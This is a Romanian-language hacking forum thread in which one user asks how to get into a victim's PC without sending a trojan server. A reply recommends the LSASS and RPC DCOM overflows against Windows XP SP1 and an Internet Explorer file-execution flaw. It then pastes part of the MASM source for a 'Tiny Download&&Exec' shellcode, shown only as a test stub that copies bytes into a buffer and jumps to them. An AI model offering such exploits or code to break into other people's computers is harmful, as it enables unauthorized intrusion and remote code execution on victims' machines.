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Am si eu o intrbare: Exista o metoda de a intra intrun PC fara sai trimitem victimei un server????Adik fara troieni k aia necesita server fara telnnet k shi ala necsita un port deschis deci trebuie sai trimitem cev victimei.Exista o metoda kre nu necesita asta??


sunt nspe metode...

depinde de sistemul de operare al victimei, sa zicem ca victima are os: winxp sp1 ,poti folosi Lsass buffer owerflow vuln, sau RPC Dcom, astea sunt 2 vulnerabilitati ale lui winxp ->sp1, sp2 e patched... sunt si alte exploituri dar nu sunt toate publice

poti folosi o vuln de IE care executa un anumit fisier...

is mai multe metode .. sunt foarte vechi astea ce ti le-am spus si nu prea mai ai sanse sa te bucuri prea mult de ele!...



foloseste exploitul asta de download&execute ...e in ASM ia un compilator ca MASM,TASM,FASM si altele..

;Tiny Download&&Exec ShellCode codz czy 2007.6.1

;header 163=61(16+8+9+(28))+95(68+27)+17


comment %

#--------------------------------------# #

# Tiny Download&&Exec ShellCode--> # #

# -->size 192 # #

# 2007.06.01 #

# codz: czy # #

# www.ph4nt0m.org # #

#------------------------------------------# #

system :test on ie6+XPSP2/2003SP2/2kSP4



.model flat,stdcall

option casemap:none

include c:\masm32\include\windows.inc

include c:\masm32\include\kernel32.inc

includelib c:\masm32\lib\kernel32.lib

include c:\masm32\include\user32.inc

includelib c:\masm32\lib\user32.lib


shelldatabuffer db 1024 dup(0)

shellcodebuffer db 2046 dup(0)

downshell db 'down exploit',0



invoke MessageBoxA,0,offset downshell,offset downshell,1

invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256

mov eax,offset shellcodebuffer

jmp eax

somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h


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